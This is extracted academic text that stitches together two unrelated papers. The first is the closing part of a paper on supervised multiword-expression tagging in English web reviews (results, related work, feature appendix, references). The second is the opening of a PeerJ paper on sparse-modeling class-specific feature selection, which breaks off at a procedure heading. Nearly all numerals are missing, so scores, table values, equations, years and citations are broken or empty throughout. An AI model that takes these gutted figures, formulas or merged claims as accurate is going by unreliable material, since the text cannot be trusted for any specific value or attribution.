of iterations and the value of the recall cost hyperparameter (ρ ). both are tuned via cross-validation on train; we use the multiple of that maximizes average link-based f . the chosen values are shown in table . experi- ments were managed with the ducttape tool. results we experimentally address the following questions to probe and justify our modeling approach. . is supervised learning necessary? previous mwe identification studies have found benefit to statistical learning over heuristic lexicon lookup (constant and sigogne, ; green et al., ). our first experiment tests whether this holds for comprehensive mwe identification: it compares our supervised tagging approach with baselines of heuristic lookup on preexisting lexicons. the base- lines construct a lattice for each sentence using the same method as lexicon-based model features (§ . ). if multiple lexicons are used, the union of their en- https://github.com/jhclark/ducttape/ tries is used to construct the lattice. the resulting segmentation—which does not encode a strength distinction—is evaluated against the gold standard. table shows the results. even with just the la- beled training set as input, the supervised approach beats the strongest heuristic baseline (that incorpo- rates in-domain lexicon entries extracted from the training data) by precision points, while achieving comparable recall. for example, the baseline (but not the statistical model) incorrectly predicts an mwe in places to eat in baltimore (because eat in, meaning ‘eat at home,’ is listed in wordnet). the supervised approach has learned not to trust wordnet too much due to this sort of ambiguity. downstream applica- tions that currently use lexicon matching for mwe identification (e.g., ghoneim and diab, ) likely stand to benefit from our statistical approach. . how best to exploit mwe lexicons (type-level information)? for statistical tagging (right portion of table ), using more preexisting (out-of-domain) lexicons generally improves recall; precision also improves a bit. a lexicon of mwes occurring in the non-held-out training data at least twice (table , bottom right) is marginally worse (better precision/worse recall) than the best result using only preexisting lexicons. . variations on the base model we experiment with some of the modeling alterna- tives discussed in § . results appear in table under both the link-based and exact match evaluation cri- teria. we note that the exact match scores are (as expected) several points lower. if we train with access to the full lexicon of training set mwes, the learner credulously overfits to relying on that lexicon—after all, it has perfect coverage of the training data!— which proves fatal for the model at test time. recall-oriented cost. the recall-oriented cost adds about link-based f point, sacrificing precision in favor of recall. unsupervised word clusters. when combined with the recall-oriented cost, these produce a slight improvement to precision/degradation to recall, im- proving exact match f but not affecting link-based f . only a few clusters receive high positive weight; one of these consists of matter, joke, biggie, pun, avail, clue, corkage, frills, worries, etc. these words are diverse semantically, but all occur in collocations with no, which is what makes the cluster coherent and useful to the mwe model. oracle part-of-speech tags. using human- annotated rather than automatic pos tags improves mwe identification by about f points on test (similar differences were observed in development). . what are the highest-weighted features? an advantage of the linear modeling framework is that we can examine learned feature weights to gain some insight into the model’s behavior. in general, the highest-weighted features are the lexicon matching features and features indicative of proper names (pos tag of proper noun, capitalized word not at the beginning of the sentence, etc.). despite the occasional cluster capturing colloca- tional or idiomatic groupings, as described in the previous section, the clusters appear to be mostly useful for identifying words that tend to belong (or not) to proper names. for example, the cluster with street, road, freeway, highway, airport, etc., as well as words outside of the cluster vocabulary, weigh in favor of an mwe. a cluster with everyday desti- nations (neighborhood, doctor, hotel, bank, dentist) prefers non-mwes, presumably because these words are not typically part of proper names in this corpus. this was from the best model using non-oracle pos tags, so the clusters are perhaps useful in correct- ing for proper nouns that were mistakenly tagged as common nouns. one caveat, though, is that it is hard to discern the impact of these specific features where others may be capturing essentially the same information. . how heterogeneous are learned mwes? on test, the final model (with automatic pos tags) predicts mwe instances ( are gappy; are pos pattern # examples (lowercased lemmas) noun noun customer service, oil change verb prep work with, deal with, yell at propn propn eagle transmission, comfort zone adj noun major award, top notch, mental health verb part move out, end up, pick up, pass up verb adv come back, come in, come by, stay away prep noun on time, in fact, in cash, for instance verb noun take care, make money, give crap verb pron thank you, get it prep prep out of, due to, out ta, in between adv adv no matter, up front, at all, early on det noun a lot, a little, a bit, a deal verb det noun answer the phone, take a chance noun prep kind of, care for, tip on, answer to table : top predicted pos patterns and frequencies. weak). there are unique mwe types. organizing the predicted mwes by their coarse pos sequence reveals that the model is not too preju- diced in the kinds of expressions it recognizes: the types fall under unique pos+strength patterns. table shows the pos sequences predicted or more times as strong mwes. some of the examples (major award, a deal, tip on) are false positives, but most are correct. singleton patterns include propn verb (god forbid), prep det (at that), adj pron (worth it), and prep verb prep (to die for). true positive mwes mostly consist of (a) named entities, and (b) lexical idioms seen in training and/or listed in one of the lexicons. occasionally the sys- tem correctly guesses an unseen and oov idiom based on features such as hyphenation (walk - in) and capitalization/oov words (chili relleno, big mis- take). on test, gold mwe types were unseen in training; the system found true positives (where the type was predicted at least once), false posi- tives, and false negatives—an unseen type recall rate of %. removing types that occurred in lexi- cons leaves true positives, false positives, and false negatives—a unseen and oov type recall rate of %. . what kinds of mismatches occur? inspection of the output turns up false positives due to ambiguity (e.g., spongy and sweet bread); false negatives (top to bottom); and overlap (get high qual- ity service, gold get high quality service; live up to, gold live up to). a number of the mismatches turn scheme ∣y∣ ρ m ∣w∣ p r f no gaps, -level . k . . . no gaps, -level . k . . . gappy, -level . , k . . . gappy, -level . , k . . . table : training with different tagging schemes. results are cross-validation averages on train. all schemes are evaluated against the full gold standard ( tags). out to be problems with the gold standard, like hav- ing our water shut off (gold having our water shut off ). this suggests that even noisy automatic taggers might help identify annotation inconsistencies and errors for manual correction. . are gappiness and the strength distinction learned in practice? three quarters of mwes are strong and contain no gaps. to see whether our model is actually sensi- tive to the phenomena of gappiness and strength, we train on data simplified to remove one or both distinctions—as in the first labelings in figure — and evaluate against the full -tag scheme. for the model with the recall cost, clusters, and oracle pos tags, we evaluate each of these simplifications of the training data in table . the gold standard for evaluation remains the same across all conditions. if the model was unable to recover gappy expres- sions or the strong/weak distinction, we would expect it to do no better when trained with the full tagset than with the simplified tagset. however, there is some loss in performance as the tagset for learning is sim- plified, which suggests that gappiness and strength are being learned to an extent. related work our annotated corpus (schneider et al., ) joins several resources that indicate certain varieties of mwes: lexicons such as wordnet (fellbaum, ), said (kuiper et al., ), and wikimwe (hartmann et al., ); targeted lists (baldwin, , ; cook et al., ; tu and roth, , ); web- sites like wiktionary and phrases.net; and large-scale corpora such as semcor (miller et al., ), the french treebank (abeillé et al., ), the szeged- paralellfx corpus (vincze, ), and the prague czech-english dependency treebank (čmejrek et al., ). the difference is that schneider et al. ( ) pursued a comprehensive annotation approach rather than targeting specific varieties of mwes or relying on a preexisting lexical resource. the annotations are shallow, not relying explicitly on syntax (though in principle they could be mapped onto the parses in the web treebank). in terms of modeling, the use of machine learn- ing classification (hashimoto and kawahara, ; shigeto et al., ) and specifically bio sequence tagging (diab and bhutada, ; constant and si- gogne, ; constant et al., ; vincze et al., ) for contextual recognition of mwes is not new. lexical semantic classification tasks like named entity recognition (e.g., ratinov and roth, ), su- persense tagging (ciaramita and altun, ; paaß and reichartz, ), and index term identification (newman et al., ) also involve chunking of cer- tain mwes. but our discriminative models, facili- tated by the new corpus, broaden the scope of the mwe identification task to include many varieties of mwes at once, including explicit marking of gaps and a strength distinction. by contrast, the afore- mentioned identification systems, as well as some mwe-enhanced syntactic parsers (e.g., green et al., ), have been restricted to contiguous mwes. however, green et al. ( ) allow gaps to be de- scribed as constituents in a syntax tree. gimpel and smith’s ( ) shallow, gappy language model al- lows arbitrary token groupings within a sentence, whereas our model imposes projectivity and nest- ing constraints (§ ). blunsom and baldwin ( ) present a sequence model for hpsg supertagging, and evaluate performance on discontinuous mwes, though the sequence model treats the non-adjacent component supertags like other labels—it cannot en- force that they mutually require one another, as we do via the gappy tagging scheme (§ . ). the lexicon lookup procedures of bejček et al. ( ) can match gappy mwes, but are nonstatistical and extremely error-prone when tuned for high oracle recall. another major thread of research has pursued un- supervised discovery of multiword types from raw corpora, such as with statistical association measures (church et al., ; pecina, ; ramisch et al., , inter alia), parallel corpora (melamed, ; moirón and tiedemann, ; tsvetkov and wint- ner, ), or a combination thereof (tsvetkov and wintner, ); this may be followed by a lookup- and-classify approach to contextual identification (ramisch et al., ). though preliminary experi- ments with our models did not show benefit to incor- porating such automatically constructed lexicons, we hope these two perspectives can be brought together in future work. conclusion this article has presented the first supervised model for identifying heterogeneous multiword expressions in english text. our feature-rich discriminative se- quence tagger performs shallow chunking with a novel scheme that allows for mwes containing gaps, and includes a strength distinction to separate highly idiomatic expressions from collocations. it is trained and evaluated on a corpus of english web reviews that are comprehensively annotated for multiword expressions. beyond the training data, its features in- corporate evidence from external resources—several lexicons as well as unsupervised word clusters; we show experimentally that this statistical approach is far superior to identifying mwes by heuristic lexicon lookup alone. future extensions might integrate addi- tional features (e.g., exploiting statistical association measures computed over large corpora), enhance the lexical representation (e.g., by adding semantic tags), improve the expressiveness of the model (e.g., with higher-order features and inference), or integrate the model with other tasks (such as parsing and transla- tion). our data and open source software are released at http://www.ark.cs.cmu.edu/lexsem/. acknowledgments this research was supported in part by nsf ca- reer grant iis- , google through the read- ing is believing project at cmu, and darpa grant fa - - - funded under the deft program. we are grateful to kevin knight, martha palmer, claire bonial, lori levin, ed hovy, tim baldwin, omri abend, members of jhu clsp, the nlp group at berkeley, and the noah’s ark group at cmu, and anonymous reviewers for valuable feedback. a basic features all are conjoined with the current label, yi. label features . previous label (the only first-order feature) token features original token . i = { , } . i = ∣w∣−{ , } . capitalized ∧ ⟦i = ⟧ . word shape lowercased token . prefix: [wi]k ∣ k= . suffix: [wi]∣w∣j ∣∣w∣j=∣w∣− . has digit . has non-alphanumeric c . context word: w j ∣i+ j=i− . context word bigram: w j+ j ∣i+ j=i− lemma features . lemma + context lemma if one of them is a verb and the other is a noun, verb, adjective, adverb, preposition, or particle: λi ∧ λ j ∣i+ j=i− part-of-speech features . context pos: pos j ∣i+ j=i− . context pos bigram: pos j+ j ∣i+ j=i− . word + context pos: wi ∧posi± . context word + pos: wi± ∧posi lexicon features (unlexicalized) wordnet only . oov: λi is not in wordnet as a unigram lemma ∧ posi . compound: non-punctuation lemma λi and the {previous, next} lemma in the sentence (if it is non-punctuation; an inter- vening hyphen is allowed) form an entry in wordnet, possibly separated by a hyphen or space . compound-hyphen: posi = hyph ∧ previous and next tokens form an entry in wordnet, possibly separated by a hyphen or space . ambiguity class: if content word unigram λi is in wordnet, the set of pos categories it can belong to; else posi if not a content pos ∧ the pos of the longest mw match to which λi belongs (if any) ∧ the position in that match (b or i) for each multiword lexicon . lexicon name ∧ status of token i in the shortest path segmen- tation (o, b, or i) ∧ subcategory of lexical entry whose match includes token i, if matched ∧ whether the match is gappy . the above ∧ pos tags of the first and last matched tokens in the expression over all multiword lexicons . at least k lexicons contain a match that includes this token (if n ≥ matches, n active features) . at least k lexicons contain a match that includes this token, starts with a given pos, and ends with a given pos references anne abeillé, lionel clément, and françois toussenel. . building a treebank for french. in anne abeillé and nancy ide, editors, treebanks, volume of text, speech and language technology, pages – . kluwer academic publishers, dordrecht, the nether- lands. timothy baldwin. . looking for prepositional verbs in corpus data. in proc. of the second acl-sigsem workshop on the linguistic dimensions of prepositions and their use in computational linguistics formalisms and applications, pages – . colchester, uk. timothy baldwin. . a resource for evaluating the deep lexical acquisition of english verb-particle con- structions. in proc. of mwe, pages – . marrakech, morocco. timothy baldwin and su nam kim. . multiword expressions. in nitin indurkhya and fred j. damerau, editors, handbook of natural language processing, second edition. crc press, taylor and francis group, boca raton, florida, usa. eduard bejček, pavel straňák, and pavel pecina. . syntactic identification of occurrences of multiword expressions in text using a lexicon with dependency structures. in proc. of the th workshop on multiword expressions, pages – . atlanta, georgia, usa. gábor berend. . opinion expression mining by ex- ploiting keyphrase extraction. in proc. of th interna- tional joint conference on natural language process- ing, pages – . chiang mai, thailand. ann bies, justin mott, colin warner, and seth kulick. a. english web treebank. technical report ldc t , linguistic data consortium, philadel- phia, pennsylvania, usa. ann bies, justin mott, colin warner, and seth kulick. b. english web treebank. technical report ldc t , linguistic data consortium, philadel- phia, pennsylvania, usa. steven bird, ewan klein, and edward loper. . natu- ral language processing with python: analyzing text with the natural language toolkit. o’reilly media, inc., sebastopol, california, usa. phil blunsom and timothy baldwin. . multilingual deep lexical acquisition for hpsgs via supertagging. in proc. of emnlp, pages – . sydney, australia. peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . marine carpuat and mona diab. . task-based eval- uation of multiword expressions: a pilot study in sta- tistical machine translation. in proc. of naacl-hlt, pages – . los angeles, california, usa. kenneth church, william gale, patrick hanks, and don- ald hindle. . using statistics in lexical analysis. in uri zernik, editor, lexical acquisition: exploiting on-line resources to build a lexicon, pages – . lawrence erlbaum associates, hillsdale, new jersey, usa. massimiliano ciaramita and yasemin altun. . broad- coverage sense disambiguation and information extrac- tion with a supersense sequence tagger. in proc. of emnlp, pages – . sydney, australia. michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proc. of emnlp, pages – . philadelphia, pennsylvania, usa. matthieu constant and anthony sigogne. . mwu- aware part-of-speech tagging with a crf model and lexical resources. in proc. of the workshop on multi- word expressions: from parsing and generation to the real world, pages – . portland, oregon, usa. matthieu constant, anthony sigogne, and patrick watrin. . discriminative strategies to integrate multiword expression recognition and parsing. in proc. of acl, pages – . jeju island, korea. paul cook, afsaneh fazly, and suzanne stevenson. . the vnc-tokens dataset. in proc. of mwe, pages – . marrakech, morocco. hal daumé, iii. . practical structured learning tech- niques for natural language processing. ph.d. disserta- tion, university of southern california, los angeles, california, usa. url http://hal .name/docs/ daume thesis.pdf. mona diab and pravin bhutada. . verb noun con- struction mwe token classification. in proc. of mwe, pages – . suntec, singapore. nick c. ellis, rita simpson-vlach, and carson maynard. . formulaic language in native and second lan- guage speakers: psycholinguistics, corpus linguistics, and tesol. tesol quarterly, ( ): – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. mit press, cambridge, mas- sachusetts, usa. charles j. fillmore, paul kay, and mary catherine o’connor. . regularity and idiomaticity in gram- matical constructions: the case of ‘let alone’. language, ( ): – . yoav freund and robert e. schapire. . large margin classification using the perceptron algorithm. machine learning, ( ): – . mahmoud ghoneim and mona diab. . multiword expressions in the context of statistical machine trans- lation. in proc. of ijcnlp, pages – . nagoya, japan. kevin gimpel and noah a. smith. . generative models of monolingual and bilingual gappy patterns. in proc. of wmt, pages – . edinburgh, scotland, uk. adele e. goldberg. . constructions: a construction grammar approach to argument structure. university of chicago press, chicago, illinois, usa. adele e. goldberg. . constructions at work: the nature of generalization in language. oxford university press, oxford, uk. edouard grave, guillaume obozinski, and francis bach. . hidden markov tree models for semantic class induction. in proc. of conll, pages – . sofia, bulgaria. spence green, marie-catherine de marneffe, john bauer, and christopher d. manning. . multiword expres- sion identification with tree substitution grammars: a parsing tour de force with french. in proc. of emnlp, pages – . edinburgh, scotland, uk. spence green, marie-catherine de marneffe, and christo- pher d. manning. . parsing models for identify- ing multiword expressions. computational linguistics, ( ): – . jan hajič, eva hajičová, jarmila panevová, petr sgall, silvie cinková, eva fučíková, marie mikulová, petr pajas, jan popelka, jiří semecký, jana Šindlerová, jan Štěpánek, josef toman, zdeňka urešová, and zdeněk Žabokrtský. . prague czech-english dependency treebank . . technical report ldc t , linguis- tic data consortium, philadelphia, pennsylvania, usa. url http://www.ldc.upenn.edu/catalog/ catalogentry.jsp?catalogid=ldc t . silvana hartmann, györgy szarvas, and iryna gurevych. . mining multiword terms from wikipedia. in maria teresa pazienza and armando stellato, editors, semi-automatic ontology development. igi global, hershey, pennsylvania, usa. chikara hashimoto and daisuke kawahara. . con- struction of an idiom corpus and its application to id- iom identification based on wsd incorporating idiom- specific features. in proc. of emnlp, pages – . honolulu, hawaii, usa. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl- : hlt, pages – . columbus, ohio. koenraad kuiper, heather mccann, heidi quinn, therese aitchison, and kees van der veer. . said. technical report ldc t , linguistic data consortium, philadelphia, pennsylvania, usa. url http://www.ldc.upenn.edu/catalog/ catalogentry.jsp?catalogid=ldc t . john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in proc. of icml, pages – . percy liang. . semi-supervised learning for nat- ural language. master’s thesis, massachusetts in- stitute of technology, cambridge, massachusetts, usa. url http://people.csail.mit.edu/ pliang/papers/meng-thesis.pdf. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . i. dan melamed. . automatic discovery of non- compositional compounds in parallel data. in proc. of emnlp, pages – . providence, rhode island, usa. george a. miller, claudia leacock, randee tengi, and ross t. bunker. . a semantic concordance. in proc. of hlt, pages – . plainsboro, new jersey, usa. scott miller, jethran guinness, and alex zamanian. . name tagging with word clusters and discriminative training. in proc. of hlt-naacl, pages – . boston, massachusetts, usa. behrang mohit, nathan schneider, rishav bhowmick, ke- mal oflazer, and noah a. smith. . recall-oriented learning of named entities in arabic wikipedia. in proc. of eacl, pages – . avignon, france. begona villada moirón and jörg tiedemann. . iden- tifying idiomatic expressions using automatic word- alignment. in proc. of the eacl workshop on multi-word expressions in a multilingual context, pages – . trento, italy. rosamund moon. . fixed expressions and idioms in english: a corpus-based approach. oxford stud- ies in lexicography and lexicology. clarendon press, oxford, uk. david newman, nagendra koilada, jey han lau, and timothy baldwin. . bayesian text segmentation for index term identification and keyphrase extraction. in proc. of coling , pages – . mumbai, india. geoffrey nunberg, ivan a. sag, and thomas wasow. . idioms. language, ( ): – . olutobi owoputi, brendan o’connor, chris dyer, kevin gimpel, nathan schneider, and noah a. smith. . improved part-of-speech tagging for online conversa- tional text with word clusters. in proc. of naacl-hlt, pages – . atlanta, georgia, usa. gerhard paaß and frank reichartz. . exploiting semantic constraints for estimating supersenses with crfs. in proc. of the ninth siam international confer- ence on data mining, pages – . sparks, nevada, usa. pavel pecina. . lexical association measures and collocation extraction. language resources and evalu- ation, ( ): – . carlos ramisch. . a generic and open framework for multiword expressions treatment: from acquisition to applications. ph.d. disser- tation, university of grenoble and federal uni- versity of rio grande do sul, grenoble, france. url http://www.inf.ufrgs.br/~ceramisch/ download_files/thesis-getalp.pdf. carlos ramisch, vitor de araujo, and aline villavicencio. . a broad evaluation of techniques for automatic acquisition of multiword expressions. in proc. of acl student research workshop, pages – . jeju is- land, korea. carlos ramisch, aline villavicencio, and christian boitet. . mwetoolkit: a framework for multiword expres- sion identification. in proc. of lrec, pages – . valletta, malta. lance a. ramshaw and mitchell p. marcus. . text chunking using transformation-based learning. in proc. of the third acl workshop on very large corpora, pages – . cambridge, massachusetts, usa. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proc. of conll, pages – . boulder, colorado, usa. marta recasens and eduard hovy. . blanc: im- plementing the rand index for coreference evaluation. natural language engineering, ( ): – . alan ritter, sam clark, mausam, and oren etzioni. . named entity recognition in tweets: an experimental study. in proc. of emnlp, pages – . edin- burgh, scotland, uk. ivan sag, timothy baldwin, francis bond, ann copes- take, and dan flickinger. . multiword expressions: a pain in the neck for nlp. in alexander gelbukh, editor, computational linguistics and intelligent text processing, volume of lecture notes in computer science, pages – . springer, berlin, germany. nathan schneider, spencer onuffer, nora kazour, emily danchik, michael t. mordowanec, henrietta conrad, and noah a. smith. . comprehensive annotation of multiword expressions in a social web corpus. in proc. of lrec. reykjavík, iceland. yutaro shigeto, ai azuma, sorami hisamoto, shuhei kondo, tomoya kouse, keisuke sakaguchi, akifumi yoshimoto, frances yung, and yuji matsumoto. . construction of english mwe dictionary and its appli- cation to pos tagging. in proc. of the th workshop on multiword expressions, pages – . atlanta, georgia, usa. james w. thatcher. . characterizing derivation trees of context-free grammars through a generalization of finite automata theory. journal of computer and system sciences, ( ): – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in proc. of hlt-naacl, pages – . edmonton, alberta, canada. yulia tsvetkov and shuly wintner. . extraction of multi-word expressions from small parallel corpora. in coling : posters, pages – . beijing, china. yulia tsvetkov and shuly wintner. . identification of multi-word expressions by combining multiple lin- guistic information sources. in proc. of emnlp, pages – . edinburgh, scotland, uk. yuancheng tu and dan roth. . learning english light verb constructions: contextual or statistical. in proc. of the workshop on multiword expressions: from parsing and generation to the real world, pages – . portland, oregon, usa. yuancheng tu and dan roth. . sorting out the most confusing english phrasal verbs. in proc. of *sem, pages – . montréal, quebec, canada. joseph turian, lev-arie ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proc. of acl, pages – . uppsala, sweden. martin čmejrek, jan cuřín, jan hajič, and jiří havelka. . prague czech-english dependency treebank: resource for structure-based mt. in proc. of eamt, pages – . budapest, hungary. marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model-theoretic coreference scoring scheme. in proc. of muc- , pages – . columbia, maryland, usa. veronika vincze. . light verb constructions in the szegedparalellfx english-hungarian parallel corpus. in proc. of lrec. istanbul, turkey. veronika vincze, istván nagy t., and jános zsibrita. . learning to detect english and hungarian light verb constructions. acm transactions on speech and lan- guage processing, ( ): : – : . submitted may accepted october published november corresponding author davide nardone, davide.nardone@live.it academic editor tzung-pei hong additional information and declarations can be found on page doi . /peerj-cs. copyright nardone et al. distributed under creative commons cc-by . open access a sparse-modeling based approach for class specific feature selection davide nardone, angelo ciaramella and antonino staiano dipartimento di scienze e tecnologie, università degli studi di napoli ‘‘parthenope’’, naples, italy abstract in this work, we propose a novel feature selection framework called sparse-modeling based approach for class specific feature selection (smba-csfs), that simultaneously exploits the idea of sparse modeling and class-specific feature selection. feature selection plays a key role in several fields (e.g., computational biology), making it possible to treat models with fewer variables which, in turn, are easier to explain, by providing valuable insights on the importance of their role, and likely speeding up the experimental validation. unfortunately, also corroborated by the no free lunch theorems, none of the approaches in literature is the most apt to detect the optimal feature subset for building a final model, thus it still represents a challenge. the proposed feature selection procedure conceives a two-step approach: (a) a sparse modeling-based learning technique is first used to find the best subset of features, for each class of a training set; (b) the discovered feature subsets are then fed to a class-specific feature selection scheme, in order to assess the effectiveness of the selected features in classification tasks. to this end, an ensemble of classifiers is built, where each classifier is trained on its own feature subset discovered in the previous phase, and a proper decision rule is adopted to compute the ensemble responses. in order to evaluate the performance of the proposed method, extensive experiments have been performed on publicly available datasets, in particular belonging to the computational biology field where feature selection is indispensable: the acute lymphoblastic leukemia and acute myeloid leukemia, the human carcinomas, the human lung carcinomas, the diffuse large b-cell lymphoma, and the malignant glioma. smba-csfs is able to identify/retrieve the most representative features that maximize the classification accuracy. with top and features, smba-csfs exhibits a promising performance when compared to its competitors from literature, on all considered datasets, especially those with a higher number of features. experiments show that the proposed approach may outperform the state-of-the-art methods when the number of features is high. for this reason, the introduced approach proposes itself for selection and classification of data with a large number of features and classes. subjects bioinformatics, data mining and machine learning, data science keywords feature selection, sparse coding, bioinformatics, dictionary learning, ensemble learning introduction data analysis is the process of evaluating data, that is often subject to high-dimensional feature spaces, i.e., where data are represented in, whatever the area of study, from biology to pattern recognition to computer vision. high dimensionality often translates into how to cite this article nardone d, ciaramella a, staiano a. . a sparse-modeling based approach for class specific feature selec- tion. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:davide.nardone@live.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. over-fitting, large computational costs and poor performance thus getting a learning task in trouble. consequently, high-dimensional feature spaces need to be lowered since its feature vectors are generally uninformative, redundant, correlated to each other and also noisy. in this paper, we focus on feature selection, which is undertaken to identify discriminative features by eliminating the ones with little or no predictive information, based on certain criteria, in order to treat with data in low dimensional spaces. feature selection (fs) is the process of selecting a subset of relevant features to use in model construction. fs plays a key role in computational biology, for instance, microarray data analysis involves a huge number of genes with respect to (w.r.t.) a small number of samples, and effectively identifying the most significant differentially expressed genes under different conditions is prominent (xiong, fang & zhao, ). the selected genes are very useful in clinical applications such as recognizing diseased profiles (calcagno et al., ; staiano et al., ; di taranto et al., ; camastra, di taranto & staiano, ), nonetheless, because of its high costs, the number of experiments that can be used for classification purposes is usually limited due to the small number of samples compared to the large number of genes in an experiment, that gives rise to the curse of dimensionality problem (friedman, hastie & tibshirani, ), which challenges the classification as well as other data analysis tasks (staiano et al., ; ciaramella et al., ). furthermore, microarray data are usually not immune from several issues, such as sensitivity, accuracy, specificity, reproducibility of results, and noisy data (draghici et al., ). for these reasons, it is unsuitable to use microarray data as they are; however, after several corrections, the relevant genes can be selected by fs approaches, and for instance use real-time pcr (xiong, fang & zhao, ) to validate the results. taking a look at the literature, by googling the keyword ‘‘feature selection’’, one gets lost in an ocean of techniques (the reader may refer to classical reviews in saeys, inza & larrañaga ( ), guyon & elisseeff ( ), hoque, bhattacharyya & kalita ( ) on the topic), often designed to tackle a specific data set. the reasons for the abundance of techniques are in the heterogeneity of the available scientific data sets and also by the limitations dictated by no free lunch theorems (wolpert & macready, ), determining the existence of no general-purpose technique which is well suited to a plethora of different kind of data. a typical taxonomy organizes fs techniques (jović, brkić & bogunović, ) in three main categories, namely filter, wrapper and embedded methods, whose belonging algorithms select a single feature subset from a complete list of features. another perspective instead, divides fs techniques in two classes, namely, traditional feature selection (tfs) for all classes (that includes filter, wrapper and embedded methods mentioned so far), and class-specific feature selection (csfs) (fu & wang, ). usually, a tfs algorithm selects one subset of features for all classes although it may be not the best one for some classes, thus leading to undesirable results. differently, a csfs policy permits to select a distinct subset of features for each class, and it can use any traditional feature selector, for choosing, given the set of classes of a classification problem, one distinct grouping of features for each class. depending on the type of the feature selector, the overall process may slightly change. nevertheless, it is worth pointing out that a csfs scheme heavily depends on the use of a specific classifier, while its use should be independent of both the classifier nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the classification step and the feature selector strategy. to this end, a general framework csfs has been proposed in (pineda-bautista, carrasco-ochoa & martınez-trinidad, ) which allows using any traditional feature selector as well as any classifier. in this paper, on the basis of the general framework for csfs, we propose a novel strategy to fs, namely a sparse-modeling based approach for class-specific feature selection, consisting of a two-step procedure. firstly, a sparse modeling based learning technique is used to find the best subset of features for each class of the training set. in doing so, it is assumed that a class is represented by using a subset of features, called representatives, such that each sample in a specific class, can be described as a linear combination of them. secondly, the discovered feature subsets are fed to a class-specific feature selection scheme in order to assess the effectiveness of the selected features in classification tasks. to this end, an ensemble of classifiers is built by training a given classifier, one for each class, on its own feature subset, i.e., the one discovered in the previous step, and a proper decision rule is adopted to compute the ensemble responses. in this way, the dilemma of choosing specific tfs strategy and classifiers in the csfs framework is effectively mitigated. methods the sparse-modeling based approach for class-specific feature selection, is based on the concepts of sparse modeling and class-specific feature selection that need to be properly introduced. sparse modeling fundamentals an active developing field of statistical learning is focused around the notion of sparsity (tibshirani, ; ciaramella & giunta, ). a sparse model (sm) is a model that can be much easier to estimate and interpret than a dense model. the sparsity assumption allows extracting meaningful features from large data sets. the aim of the first phase of the proposed approach is to use a sparse modeling for finding data representatives without any transformation and to be performed directly in the data space. in other words, we wish to find a ranking of the most representative features that best reconstruct the data collection. most approaches are based on a l -norm regularization such as lasso (tibshirani, and sparse dictionary learning elhamifar, sapiro & vidal, ). formally, given a set of features in rm arranged as columns of a data matrix x=[x ,...,xn], the task is to find representative features given a fixed feature space belonging to a collections of data points (see mairal et al., ; aharon, elad & bruckstein, ; engan, aase & husoy, ; jolliffe, ; ramirez, sprechmann & sapiro, ). that task can conveniently be described in the dictionary learning (dl) framework, where the aim is to simultaneously learn a compact dictionary d=[d ,...,dk]∈rm×k and coefficients c=[c ,...,cn]∈rk×n, with k �n, that can well represent collections of data points (ciaramella, gianfico & giunta, ). the best representation of the data is obtained by minimizing the following objective function n∑ i= ‖xi−dci‖ =‖x−dc‖ f ( ) nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. w.r.t. the dictionary d and the coefficient matrix c, subject to appropriate constraints. however, the dictionary learned atoms almost never correspond to the original feature space (aharon, elad & bruckstein, ; ramirez, sprechmann & sapiro, ; mairal et al., ). in order to find a subset of features that best represent the entire feature space, the optimization problem in eq. ( ) is reformulated forcing the dictionary d to be the data matrix x (elhamifar, sapiro & vidal, ): n∑ i= ‖xi−xci‖ =‖x−xc‖ f, ( ) where f is the frobenius norm. equation ( ) is minimized w.r.t the coefficient matrix c , [c ,...,cn]∈rn×n, subject to additional constraints. in other words, the reconstruction error of each feature component is minimized by linearly combining all the components of the feature space. to choose k�n representatives involved in the linear reconstruction of each component in eq. ( ), the following constraint is added to the model ‖c‖ ,q≤k, ( ) where the mixed ` /`q norm is defined as ‖c‖ ,q , ∑n i= i( ∥∥ci∥∥q > ), ci denotes the i-th row of c, and i(·) denotes the indicator function. in a nutshell,‖c‖ ,q counts the number of nonzero rows of c. the indices of the nonzero rows of c correspond to the indices of the columns of x which are chosen as the representative features. since the aim is to select k�n representative features that can reconstruct each feature of the x matrix up to a fixed error, the optimization problem to solve is minimize c ‖x−xc‖ f subject to ‖c‖ ,q≤k, t c= t ( ) where t c= t is the affine constraint for selecting representatives that are invariant w.r.t. a global translation of the data (as requested by dimensionality reduction methods). this is an np-hard problem as it implies a combinatorial calculation over every subset of the k columns of x. therefore, relaxing ` to ` norm, the problem becomes minimize c ‖x−xc‖ f subject to ‖c‖ ,q≤τ, t c= t ( ) where ‖c‖ ,q , ∑n i= ∥∥ci∥∥q is the sum of the `q norms of the rows of c and τ > is an appropriate chosen parameter. the solution of the optimization (eq. ( )) not only provides the representative features as the nonzero rows of the c, but also provides information about the ranking of the selected features. more precisely, a representative that has higher ranking takes part in the reconstruction process more than the others, hence, its corresponding row in the optimal coefficient matrix c has many nonzero elements with large values. conversely, a representative with lower ranking takes part in the reconstruction process less than the others, hence, its corresponding row in c has a few nonzero elements with smaller values. thus, the k representative features xi ,...,xik are ranked as i ≥ i ≥···≥ ik, whenever for the corresponding rows of c one gets∥∥ci ∥∥q≥∥∥ci ∥∥q···≥∥∥cik∥∥q, ( ) nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. procedure smba input: x, n 